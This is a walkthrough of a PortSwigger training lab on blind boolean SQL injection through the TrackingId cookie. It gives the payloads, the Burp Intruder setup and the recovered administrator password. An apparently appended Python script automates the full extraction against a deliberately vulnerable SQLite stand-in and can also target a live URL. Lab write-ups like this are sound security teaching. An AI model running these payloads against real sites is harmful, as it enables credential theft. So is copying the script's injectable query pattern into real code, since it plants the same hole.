Solving Portswigger Academy: Blind SQL injection with conditional responses

Vishal
3 min read · Sep 18, 2024


In this lab we solve the challenge of recovering the administrator's password using blind, boolean-based SQL injection: we never see query output directly, only whether a condition we inject evaluates to true or false.

When you visit the lab, you will see a page that looks like the one below.

application home page

The back-end request and response look like this:

Request and Response

This time the category parameter is not vulnerable; instead, the cookie called TrackingId is. Send the request to Repeater so we can test it further. With the original cookie value the response is 5498 bytes. Appending a single quote to the TrackingId value (which breaks the string literal in the back-end query) gives a smaller response of 5437 bytes, because part of the page is missing.

Next I appended a conditional payload, ' AND '1'='1, to the cookie value and got the same 5498-byte response as the normal request. The normal response contains the string "Welcome back!".

SQLi with valid condition

To test it further I used ' AND '1'='2, which is false, and the response came back without the "Welcome back!" string.

This confirms the injection and gives us a boolean oracle: a true condition produces "Welcome back!", a false one does not. The lab description already provides enough information (a users table with username and password columns); otherwise we would first have to enumerate the length of the current database name, then the name itself, the number of tables, the length of each table name, the table names, and so on, one true/false question at a time.

As the lab states, we need to find the administrator's password from the users table. For this we can use the SUBSTRING() function, which returns a slice of a string given a start position and a length, to test one character of the password at a time.

So the condition we inject becomes (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='character'

The final payload, appended to the existing TrackingId value, looks like ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='character'. Because this goes inside a Cookie header, it is safer to URL-encode the payload (spaces, quotes and parentheses); in Burp, select the payload and press Ctrl+U, and Intruder's "URL-encode these characters" payload option does the same.

To find the first character of the password, I used Intruder with the compared character as the payload position and a payload list of a-z, A-Z and 0-9, and under settings I added a Grep - Match entry for the string "Welcome" so that true responses are flagged in the results.

Intruder results

As the screenshot shows, the first letter of the password is 'b'. To recover the remaining characters we use Intruder with two payload positions: the start index in SUBSTRING and the character being compared. Set the attack type to Cluster bomb so that every combination of the two positions is tried.

For the first position use numbers from 1 to around 25 (SUBSTRING positions are 1-indexed, and 25 leaves headroom above the lab's 20-character passwords), and for the second position use the same character set as before. Positions beyond the real length of the password never match any character, which is how the length reveals itself.

Final intruder result.

The password is 20 characters long: 'b1erjkf1fcyluoe95z4z'. Log in as administrator with this password to solve the lab.
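The whole procedure above (the three detection probes, then character-by-character extraction) is easy to script once you treat "Welcome back!" as a yes/no oracle. The following is an added example, not code from the article or from PortSwigger: it builds a constructed, deliberately vulnerable SQLite stand-in for the lab's back end (the table and column names TrackedUsers/TrackingId and users/username/password, the cookie value AbCdEf123456 and the wiener row are assumptions for the simulation; the administrator password is the value the article recovered, used here as test data), then runs the same attack against it. It additionally finds the password length with LENGTH() before looping, and uses SUBSTR because SQLite understands it; on the lab's own database the article's SUBSTRING works just as well. The lab_oracle function shows how the same oracle would be pointed at the real lab, URL-encoding the cookie value; it is not exercised offline.

```python
import sqlite3
import string
import urllib.parse
import urllib.request
from typing import Callable

# Character set to brute-force (the lab's passwords use lowercase letters and digits).
CHARSET = string.ascii_lowercase + string.digits

# ---- Constructed stand-in for the lab back end (assumption: not PortSwigger's code) ----
# It models the behaviour the article observes: the TrackingId cookie is concatenated
# into a query, a row coming back means "Welcome back!" is rendered, and a SQL error
# is silently swallowed (no row, no message).
BASE_COOKIE = "AbCdEf123456"              # constructed TrackingId value
SECRET_PASSWORD = "b1erjkf1fcyluoe95z4z"  # the value the article recovers, used as test data


def build_backend() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE TrackedUsers (TrackingId TEXT);"
        "CREATE TABLE users (username TEXT, password TEXT);"
        f"INSERT INTO TrackedUsers VALUES ('{BASE_COOKIE}');"
        "INSERT INTO users VALUES ('wiener', 'peter');"
        f"INSERT INTO users VALUES ('administrator', '{SECRET_PASSWORD}');"
    )
    return conn


_BACKEND = build_backend()


def simulated_oracle(tracking_id: str) -> bool:
    """True iff the page would contain 'Welcome back!'. Deliberately vulnerable:
    the cookie value is interpolated straight into the SQL string."""
    query = f"SELECT TrackingId FROM TrackedUsers WHERE TrackingId = '{tracking_id}'"
    try:
        return len(_BACKEND.execute(query).fetchall()) > 0
    except sqlite3.Error:  # the lone quote from the first probe breaks the syntax
        return False


# ---- Attacker side: the steps the article performs in Repeater and Intruder ----
def confirm_injection(oracle: Callable[[str], bool], base: str) -> bool:
    """Reproduces the three probes: bare quote, ' AND '1'='1, ' AND '1'='2."""
    quote_breaks = not oracle(base + "'")
    true_cond = oracle(base + "' AND '1'='1")
    false_cond = not oracle(base + "' AND '1'='2")
    return quote_breaks and true_cond and false_cond


def password_length(oracle: Callable[[str], bool], base: str, max_len: int = 40) -> int:
    """Finds the length first so the character loop knows when to stop (the article
    instead brute-forces positions 1..25 and watches which ones never match)."""
    for n in range(1, max_len + 1):
        cond = f"(SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)={n})='a"
        if oracle(f"{base}' AND {cond}"):
            return n
    raise RuntimeError("no length matched; check the oracle or raise max_len")


def extract_password(oracle: Callable[[str], bool], base: str, length: int,
                     charset: str = CHARSET, substr_fn: str = "SUBSTR") -> str:
    """Position-by-position boolean extraction: one query per (position, candidate)."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            cond = f"(SELECT {substr_fn}(password,{pos},1) FROM users WHERE username='administrator')='{ch}"
            if oracle(f"{base}' AND {cond}"):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no character matched at position {pos}")
    return recovered


def lab_oracle(lab_url: str, session_cookie: str = "") -> Callable[[str], bool]:
    """Builds an oracle against the real lab (assumption: its home page returns
    'Welcome back!' for a true condition). Not exercised offline."""
    def oracle(tracking_id: str) -> bool:
        # URL-encode the payload so spaces, quotes and parentheses survive the Cookie header.
        cookie = "TrackingId=" + urllib.parse.quote(tracking_id, safe="")
        if session_cookie:
            cookie += "; session=" + session_cookie
        req = urllib.request.Request(lab_url, headers={"Cookie": cookie})
        with urllib.request.urlopen(req, timeout=15) as resp:
            return b"Welcome back!" in resp.read()
    return oracle


if __name__ == "__main__":
    assert confirm_injection(simulated_oracle, BASE_COOKIE)
    n = password_length(simulated_oracle, BASE_COOKIE)
    print(n, extract_password(simulated_oracle, BASE_COOKIE, n))
```

Two practical points the script makes visible: finding the length first costs at most a few dozen requests and avoids guessing an upper bound for the Intruder position range, and the charset matters for the comparison. On a database whose default collation is case-insensitive (MySQL, for example), 'B' and 'b' would both satisfy the = test, so a mixed-case list produces duplicate hits; here lowercase plus digits is enough.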

This is how we solve the lab.
